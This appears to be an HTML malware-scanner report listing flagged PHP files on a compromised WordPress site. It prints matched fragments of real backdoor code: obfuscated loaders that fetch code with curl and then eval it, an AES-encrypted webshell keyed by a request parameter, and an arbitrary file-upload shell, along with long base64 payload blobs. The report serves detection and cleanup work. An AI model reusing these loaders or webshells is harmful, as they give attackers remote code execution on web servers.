<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">nYsMTLbNC</span><span style="color: #007700">(</span><span style="color: #0000BB">$quE</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ygLJSiAF </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; </span><span style="color: #0000BB">$PH </span><span style="color: #007700">= </span><span style="color: #0000BB">$ygLJSiAF</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$aFZr </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"<"</span><span style="color: #007700">, </span><span style="color: #0000BB">$quE</span><span style="color: #007700">); </span><span style="color: #0000BB">$TZr </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$aFZr </span><span style="color: #007700">as </span><span style="color: #0000BB">$ut </span><span style="color: #007700">=> </span><span style="color: #0000BB">$SBbHAPj</span><span style="color: #007700">) </span><span style="color: #0000BB">$TZr </span><span style="color: #007700">.= </span><span style="color: #0000BB">$PH</span><span style="color: #007700">[</span><span style="color: #0000BB">$SBbHAPj </span><span style="color: #007700">- </span><span style="color: #0000BB">30378</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$TZr</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">IXqi</span><span style="color: #007700">(</span><span style="color: #0000BB">$bMaputhENW</span><span style="color: #007700">, </span><span style="color: #0000BB">$pNSFXvkzxl</span><span style="color: #007700">) { </span><span style="color: #0000BB">$YrljpUXVE </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$tgUXSljfmR </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$YrljpUXVE</span><span style="color: #007700">); return empty(</span><span style="color: #0000BB">$tgUXSljfmR</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$pNSFXvkzxl</span><span style="color: #007700">(</span><span style="color: #0000BB">$bMaputhENW</span><span style="color: #007700">) : </span><span style="color: #0000BB">$tgUXSljfmR</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">XS</span><span style="color: #007700">() { </span><span style="color: #0000BB">$wXQjmutiHS </span><span style="color: #007700">= array(</span><span style="color: #DD0000">"30405<30390<30403<30407<30388<30403<30409<30402<30387<30394<30405<30388<30399<30393<30394"</span><span style="color: #007700">,</span><span style="color: #DD0000">"30</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silenced_eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@eval(</span><span style="color: #0000BB">$nH</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">+</span><span style="color: #0000BB">3</span><span style="color: #007700">](</span><span style="color: #0000BB">$BQcf</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$E</span><span style="color: #007700">[</span><span style="color: #0000BB">68</span><span style="color: #007700">](${</span><span style="color: #0000BB">$E</span><span style="color: #007700">[</span><span style="color: #0000BB">50</span><span style="color: #007700">]}[</span><span style="color: #0000BB">25</span><span style="color: #007700">])); } </span><span style="color: #0000BB">metaphone</span><span style="color: #007700">(</span><span style="color: #DD0000">"AuV5azu0/9u2vs6SLdwWjxsFG5xHaOdw7E5SjFXEGlk"</span><span style="color: #007700">); class </span><span style="color: #0000BB">s</span><span style="color: #007700">{ static function </span><span style="color: #0000BB">nYsMTLbNC</span><span style="color: #007700">(</span><span style="color: #0000BB">$quE</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ygLJSiAF </span><span style="color: #007700">= </span><span style="color: #DD0000">"r"</span><span style="color: #007700">.</span><span style="color: #DD0000">"a"</span><span style="color: #007700">.</span><span style="color: #DD0000">"n"</span><span style="color: #007700">.</span><span style="color: #DD0000">"g"</span><span style="color: #007700">.</span><span style="color: #DD0000">"e"</span><span style="color: #007700">; </span><span style="color: #0000BB">$PH </span><span style="color: #007700">= </span><span style="color: #0000BB">$ygLJSiAF</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$aFZr </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"<"</span><span style="color: #007700">, </span><span style="color: #0000BB">$quE</span><span style="color: #007700">); </span><span style="color: #0000BB">$TZr </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$aFZr </span><span style="color: #007700">as </span><span style="color: #0000BB">$ut </span><span style="color: #007700">=> </span><span style="color: #0000BB">$SBbHAPj</span><span style="color: #007700">) </span><span style="color: #0000BB">$TZr </span><span style="color: #007700">.= </span><span style="color: #0000BB">$PH</span><span style="color: #007700">[</span><span style="color: #0000BB">$SBbHAPj </span><span style="color: #007700">- </span><span style="color: #0000BB">30378</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$TZr</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">IXqi</span><span style="color: #007700">(</span><span style="color: #0000BB">$bMaputhENW</span><span style="color: #007700">, </span><span style="color: #0000BB">$pNSFXvkzxl</span><span style="color: #007700">) { </span><span style="color: #0000BB">$YrljpUXVE </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span><span style="color: #0000BB">$bMaputhENW</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$YrljpUXVE</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$tgUXSljfmR </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$YrljpUXVE</span><span style="color: #007700">); return empty(...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_142").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/sunrise/sunrise/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:36</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:36</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_143" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'gx683tB8niiMAf7g3aJZMrQWJhxLJ79W4N8tnfPS9nf71HfpOO8t3HXqHs9pmve4jDlrXP4wjfo4r16jq8Laep23zVK6q7XsSz+zTP/+tHvzLPd8KW4l7f7sHuXuHf8qHUtA3M4Odeugf199pGfObKRsxGoP9P6tuYv3f8+1JHtNvdjRErhMNOSB7F8RNzkT41zn2z+3oQPva9DSJMHVKBoX7yjVw+sXAg4NRfgArir0UgETftfTp+rqi1TXaP5cH5GcGzoCk3Gf0twFeCxMSdGEADMOhPIbZcI+0KjT2yJ8Msu+DD3XO+HjVgH2VyPQaoGdxoPdBd7sGe3WqI7i3+53OoTn38mZXfw1O+prV2q1aUZpJC2JbPjXou0PP7eW4Pfyeda2XXp1Lneav2DpD8CS1aQ0VVEb9+ecaVtegfanIxEvLxBtXau+bi626/PKKvtzg/CyqmVTACwBl7FDA1aFWtnBMTMjPj7V8ce7gb1FPMG37LK...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">QLMC</span><span style="color: #007700">(</span><span style="color: #0000BB">$wLfT</span><span style="color: #007700">) { </span><span style="color: #0000BB">$Zlvn </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$IZUhQ </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$Zlvn</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$XPBhy </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$wLfT</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$XPBhy</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$Zlvn</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$IZUhQ</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">QLMC</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'MImGpmZGznWdoGjO1x661Y7KkBE1F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$QLMC</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$QLMC</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LAVe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_143").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/sunrise/sunrise/sunrise/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:12</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:12</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_144" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'wa4Y6A/wfUQsW4brOtcqWyJg1TZ4yyYP1d7fc4avc7lHc5eP6hLnb87d6JxXM45D/bLEey+Pf855+tVeElAV9byyO2z2kwlrvPO+wb3ekOO/+9VxKPc9bn9ydS96rX9giD45B3px7k8pmvP14TZTJi1WLzp9Zt1F7d+j/vO5YM5vbMiaFEp3PFsWw31MTOh0D/aP3/jC1sqXPYlzQEpTUvWkLbgtbfAC7DC8GpWERRpBLOZ64uy/RVmxT76M10U6PQmxnyE+A7kp79OohJk4FoAHSkCOW2S4cMLkOuZLjwzx+KIuSX57XMWDiZXLXQpjSUTH9hLu7Wrh3tlKyu4tnBsD205NvZ21nea9Q2altatGVOa2QLn973FpL9rzunR73vYvuM8z9c9xjv2r9Q6oPBoaNI6uaitafPOtqWJ0ftTkYi3h4w1vdH/NRdb9/7JNLtTovCyuGVQESwDtDFDEVaGWznBMzMiHz7V8Me5k71EPsG07rj2...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">RmC</span><span style="color: #007700">(</span><span style="color: #0000BB">$aeFl</span><span style="color: #007700">) { </span><span style="color: #0000BB">$mLeF </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$txpUj </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$mLeF</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$CwS </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$aeFl</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$CwS</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$mLeF</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$txpUj</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">RmC</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'jPyj6KpLYvR3o6SSXxcQhnZcjXCBIk7t3o4</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$RmC</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$RmC</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_144").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/sunrise/sunrise/sunrise/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 67.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:12</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:12</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_145" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"U2FWZmh5UlB1WkF0anNLTHBpTi50aWZm"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_145").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/css/colors/sunrise/sunrise/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.94 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:36</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:36</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_146" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$vLWUjuM1JNcHhyx</span><span style="color: #007700">[</span><span style="color: #0000BB">35</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$WUXQ6JkAYj5obZD</span><span style="color: #007700">; goto </span><span style="color: #0000BB">T15i8yl5ovpOgjJ</span><span style="color: #007700">; </span><span style="color: #0000BB">OHVe20n3g6nn3sD</span><span style="color: #007700">: </span><span style="color: #0000BB">$QZmz5amvSS7r8zE </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"o"</span><span style="color: #007700">, </span><span style="color: #0000BB">$PV53e40FMFr7I7M</span><span style="color: #007700">); goto </span><span style="color: #0000BB">Nx6pCUlrpI0e9Bp</span><span style="color: #007700">; </span><span style="color: #0000BB">uOmLB_NjEs1bV2A</span><span style="color: #007700">: </span><span style="color: #0000BB">$NFi_0iaNhCmQsMy </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; goto </span><span style="color: #0000BB">q7pZjcwkU7c9hJO</span><span style="color: #007700">; </span><span style="color: #0000BB">R5D4cQ2YbDh0m2t</span><span style="color: #007700">: </span><span style="color: #0000BB">Gc271brZgP2z8ac</span><span style="color: #007700">: goto </span><span style="color: #0000BB">GAVhKVSgCL0YLvK</span><span style="color: #007700">; </span><span style="color: #0000BB">q7pZj</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); goto </span><span style="color: #0000BB">F_0pvTNEAfBWvdP</span><span style="color: #007700">; </span><span style="color: #0000BB">NU_Fis952UIEnwt</span><span style="color: #007700">: return empty(</span><span style="color: #0000BB">$mAikWK8B6i0Iowg</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$WDuT1OVEa55q0OW</span><span style="color: #007700">(</span><span style="color: #0000BB">$cYHifYJYD8Smusy</span><span style="color: #007700">) : </span><span style="color: #0000BB">$mAikWK8B6i0Iowg</span><span style="color: #007700">; goto </span><span style="color: #0000BB">A0A2uQXUpFzXqFp</span><span style="color: #007700">; </span><span style="color: #0000BB">A0A2uQXUpFzXqFp</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">aNHli1QN0Obu7rI</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">akcNhVnUS_9tFBf</span><span style="color: #007700">; </span><span style="color: #0000BB">wpUhSRdUGSRVeRc</span><span style="color: #007700">: if</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_146").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/theme-insmkuy.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 344.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_147" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite</span><span style="color: #007700">(</span><span style="color: #0000BB">fopen</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'w'</span><span style="color: #007700">), </span><span style="color: #0000BB">$b4</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; fwrite(fopen(trim($_POST['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']), '</span><span style="color: #0000BB">w</span><span style="color: #DD0000">'), $b4(trim($_POST['</span><span style="color: #0000BB">message</span><span style="color: #DD0000">']))); exit; } move_uploaded_file($_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">tmp_name</span><span style="color: #DD0000">'], $_FILES['</span><span style="color: #0000BB">file</span><span style="color: #DD0000">']['</span><span style="color: #0000BB">name</span><span style="color: #DD0000">']); ?></span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_147").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/network/network/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:00</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:00</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_148" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'wiOG/5B/roIDw3O4tWSGzKkVSY8SyevFezf82XHs6r3e5xXornP988i9m9P081DfeIc9yBnf4zFcueeQRvo6vafPaVha9mMXNK+wb/+8tHruDe9aNaxLn/2dT8mbX+4SP4ah2pxbm8NGvK54Td/ZiEiY/tRZu/1bZxfvvI9oP+HbOrGlEmDYGjSA318TNjkT8dzn+t+1sgPvatDQFsHUuU0rZpxLcL2LAB8mofQhRhVbOQirv2vxUvVV1+pKpncfiMDPnJUh2LjP6W4CLhYGpODBkBGm0XksMOEeuVjTyyJ+IMu8Pz3XOeHiZQH3RiPSWIGe5IPdBd7tKu3UqY7j/+52OYTn3cmZX/w3Cuc1Kb1aN6s0AR7ntLwFrL9rzunE+7XsXXm9x20+57X71WIdiXQqUDiuoq4r13jTpq1C+XbEJuYdJOI8K31fRc3U9/+RzW7E4vgsqZ1EgAcI5exAQtWRV7ZAzEz4z4eFPn3O4WdxDjx9+iD...</span>
</span>
